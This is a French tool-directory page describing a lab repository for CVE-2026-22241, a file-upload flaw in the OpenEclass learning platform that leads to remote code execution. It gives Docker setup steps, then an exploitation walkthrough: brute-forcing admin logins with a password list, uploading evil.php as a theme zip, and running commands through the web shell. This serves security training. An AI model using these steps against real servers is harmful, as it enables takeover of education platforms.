Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22241 — Environnement de laboratoire pour CVE-2026-22241 | Kitploit
Outils/GitHubGitHub/cves-labs/cve-2026-22241
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubcves-labs/cve-2026-22241

CVE-2026-22241

Environnement de laboratoire pour CVE-2026-22241

Voir le dépôt
47il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-22241

Environnement de laboratoire pour CVE-2026-22241

Description de la vulnérabilité :

  • Vulnérabilité : Téléchargement sans restriction de fichier de type dangereux.
  • Impact : Exécution de code à distance (RCE).
  • Description : Cette faille permet à un attaquant disposant de privilèges administratifs de télécharger un fichier PHP malveillant (Web Shell), entraînant une compromission totale de l'intégrité et de la sécurité du serveur web.
  • Système cible : Infrastructure éducative OpenClass.

1. Construire l'environnement

sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git

ouvrez https://www.openeclass.org/en/previous-versions/ et téléchargez openeclass-4.0.1.zip

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

sudo cp openeclass-4.0.1.zip CVE-2026-22241

cd CVE-2026-22241

sudo mkdir html

sudo unzip openeclass-4.0.1.zip -d ./temp_folder

sudo mv ./temp_folder/openeclass-4.0.1/* ./html/

sudo rm -rf ./temp_folder

sudo rm -rf openeclass-4.0.1.zip

sudo chown -R $USER:www-data html/

sudo chmod -R 775 html/

sudo docker-compose up -d

sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"

sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web

http://ip-docker

Télécharger l’outil
image

2. Exploiter la vulnérabilité :

pour la liste de clés dans ZAP (Brute Force) : https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt

zip poc.zip evil.php

dans la page eclass : allez dans l'outil d'administration -> paramètres du thème -> puis téléchargez poc.zip

dans une nouvelle page :

http://ip-docker/courses/theme_data/evil.php?cmd=whoami

http://ip-docker/courses/theme_data/evil.php?cmd=id